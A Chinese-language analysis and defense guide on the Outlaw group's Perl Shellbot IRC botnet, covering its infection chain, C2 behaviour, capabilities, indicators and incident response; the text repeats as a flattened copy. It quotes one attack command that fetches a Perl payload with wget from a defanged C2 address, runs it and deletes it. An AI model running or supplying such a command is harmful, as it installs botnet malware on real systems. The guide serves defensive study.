基于Perl的Shellbot通过C2发起攻击
字数 1680 2025-08-19 12:42:32

Perl-based Shellbot 攻击分析与防御指南

1. 攻击概述

Outlaw黑客组织使用基于Perl Shellbot构建的IRC bot进行攻击活动,主要针对物联网设备和Linux服务器,但也影响Windows环境和Android设备。

1.1 攻击特点

  • 使用IRC协议进行C2(命令与控制)通信
  • 通过暴力破解或利用已知漏洞传播
  • 构建可用于网络犯罪的僵尸网络
  • 具备DoS和SSH暴力破解能力

2. 攻击技术分析

2.1 感染流程

  1. 初始入侵:通过暴力破解或利用漏洞获取访问权限
  2. 下载payload:使用wget下载恶意Perl脚本(n3文件)
  3. 执行payload:使用Perl解释器运行下载的脚本
  4. 清理痕迹:删除下载的n3文件

典型攻击命令示例:

uname -a;cd /tmp;wget hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf n3*

2.2 C2通信机制

  • 使用IRC协议与C2服务器通信
  • 连接断开后会自动重连
  • 使用PING/PONG机制保持连接活跃
  • 受感染主机被分配昵称(如sEx-3635)

2.3 僵尸网络功能

2.3.1 信息收集

  • 获取系统信息(uname -a)
  • 读取/etc/passwd文件
  • 收集处理器信息

2.3.2 攻击能力

  • 端口扫描(常见端口列表见下文)
  • DDoS攻击(UDP/TCP/HTTP洪水)
  • 文件下载与执行
  • 进程列表获取

2.3.3 IRC命令函数

  • join, part, uejoin, op, deop
  • voice, devoice, nick, msg
  • quit, uaw, die

2.4 端口扫描目标

僵尸网络会扫描以下端口:

端口号 服务
21 FTP
22 SSH
23 Telnet
25 SMTP
80 HTTP
110 POP3
143 IMAP
443 HTTPS
3306 MySQL
3389 RDP

3. 攻击基础设施

3.1 C2服务器

  • 主C2服务器:luci[.]madweb[.]ro
  • 备用服务器:54[.]37[.]72[.]170

3.2 被利用的服务器

  • 日本艺术机构的FTP服务器
  • 孟加拉国政府的Dovecot邮件服务器

3.3 攻击者身份

监控到的IRC通信中出现的身份包括:

  • luci, lucian
  • dragos, mazy
  • hydra, poseidon

4. 防御措施

4.1 SSH安全配置

  1. 限制SSH服务的公开访问
  2. 禁用默认凭证
  3. 实施强密码策略
  4. 考虑使用密钥认证替代密码

4.2 系统监控

  1. 监控CLI命令使用情况
  2. 检测端口53上的非DNS流量
  3. 监控新账户创建
  4. 定期审计系统账户

4.3 服务安全

  1. 限制FTP使用,或使用SFTP/SCP替代
  2. 谨慎使用Dovecot邮件服务器(已知存在缓冲区溢出漏洞)
  3. 及时更新所有服务的安全补丁

4.4 文件系统监控

  1. 监控/tmp目录的异常文件
  2. 建立文件完整性监控
  3. 对预设位置外的文件创建保持警惕

5. 检测指标

5.1 网络指标

  • 与luci[.]madweb[.]ro或54[.]37[.]72[.]170的通信
  • 异常的IRC协议流量
  • 非标准端口的IRC通信

5.2 系统指标

  • 名为"Shellbot"的进程
  • /usr/sbin/httpd的异常实例
  • sd-pam用户的可疑活动
  • /tmp目录下的临时文件创建与删除

5.3 行为指标

  • 异常的PING/PONG网络流量
  • 端口扫描活动
  • 系统信息收集行为

6. 应急响应建议

  1. 隔离系统:立即断开受感染系统的网络连接
  2. 取证分析:收集系统日志、网络流量和内存转储
  3. 清除恶意软件:识别并删除所有相关文件和进程
  4. 凭证重置:更改所有可能泄露的凭证
  5. 漏洞修复:修补被利用的安全漏洞
  6. 监控:加强监控以检测可能的再次感染

通过实施这些防御措施和监控手段,组织可以显著降低被此类Perl-based Shellbot攻击的风险。

Perl-based Shellbot 攻击分析与防御指南 1. 攻击概述 Outlaw黑客组织使用基于Perl Shellbot构建的IRC bot进行攻击活动,主要针对物联网设备和Linux服务器,但也影响Windows环境和Android设备。 1.1 攻击特点 使用IRC协议进行C2(命令与控制)通信 通过暴力破解或利用已知漏洞传播 构建可用于网络犯罪的僵尸网络 具备DoS和SSH暴力破解能力 2. 攻击技术分析 2.1 感染流程 初始入侵 :通过暴力破解或利用漏洞获取访问权限 下载payload :使用wget下载恶意Perl脚本(n3文件) 执行payload :使用Perl解释器运行下载的脚本 清理痕迹 :删除下载的n3文件 典型攻击命令示例: 2.2 C2通信机制 使用IRC协议与C2服务器通信 连接断开后会自动重连 使用PING/PONG机制保持连接活跃 受感染主机被分配昵称(如sEx-3635) 2.3 僵尸网络功能 2.3.1 信息收集 获取系统信息(uname -a) 读取/etc/passwd文件 收集处理器信息 2.3.2 攻击能力 端口扫描(常见端口列表见下文) DDoS攻击(UDP/TCP/HTTP洪水) 文件下载与执行 进程列表获取 2.3.3 IRC命令函数 join, part, uejoin, op, deop voice, devoice, nick, msg quit, uaw, die 2.4 端口扫描目标 僵尸网络会扫描以下端口: | 端口号 | 服务 | |-------|------| | 21 | FTP | | 22 | SSH | | 23 | Telnet | | 25 | SMTP | | 80 | HTTP | | 110 | POP3 | | 143 | IMAP | | 443 | HTTPS | | 3306 | MySQL | | 3389 | RDP | 3. 攻击基础设施 3.1 C2服务器 主C2服务器:luci[ .]madweb[ . ]ro 备用服务器:54[ .]37[ .]72[ . ]170 3.2 被利用的服务器 日本艺术机构的FTP服务器 孟加拉国政府的Dovecot邮件服务器 3.3 攻击者身份 监控到的IRC通信中出现的身份包括: luci, lucian dragos, mazy hydra, poseidon 4. 防御措施 4.1 SSH安全配置 限制SSH服务的公开访问 禁用默认凭证 实施强密码策略 考虑使用密钥认证替代密码 4.2 系统监控 监控CLI命令使用情况 检测端口53上的非DNS流量 监控新账户创建 定期审计系统账户 4.3 服务安全 限制FTP使用,或使用SFTP/SCP替代 谨慎使用Dovecot邮件服务器(已知存在缓冲区溢出漏洞) 及时更新所有服务的安全补丁 4.4 文件系统监控 监控/tmp目录的异常文件 建立文件完整性监控 对预设位置外的文件创建保持警惕 5. 检测指标 5.1 网络指标 与luci[ .]madweb[ .]ro或54[ .]37[ .]72[ . ]170的通信 异常的IRC协议流量 非标准端口的IRC通信 5.2 系统指标 名为"Shellbot"的进程 /usr/sbin/httpd的异常实例 sd-pam用户的可疑活动 /tmp目录下的临时文件创建与删除 5.3 行为指标 异常的PING/PONG网络流量 端口扫描活动 系统信息收集行为 6. 应急响应建议 隔离系统 :立即断开受感染系统的网络连接 取证分析 :收集系统日志、网络流量和内存转储 清除恶意软件 :识别并删除所有相关文件和进程 凭证重置 :更改所有可能泄露的凭证 漏洞修复 :修补被利用的安全漏洞 监控 :加强监控以检测可能的再次感染 通过实施这些防御措施和监控手段,组织可以显著降低被此类Perl-based Shellbot攻击的风险。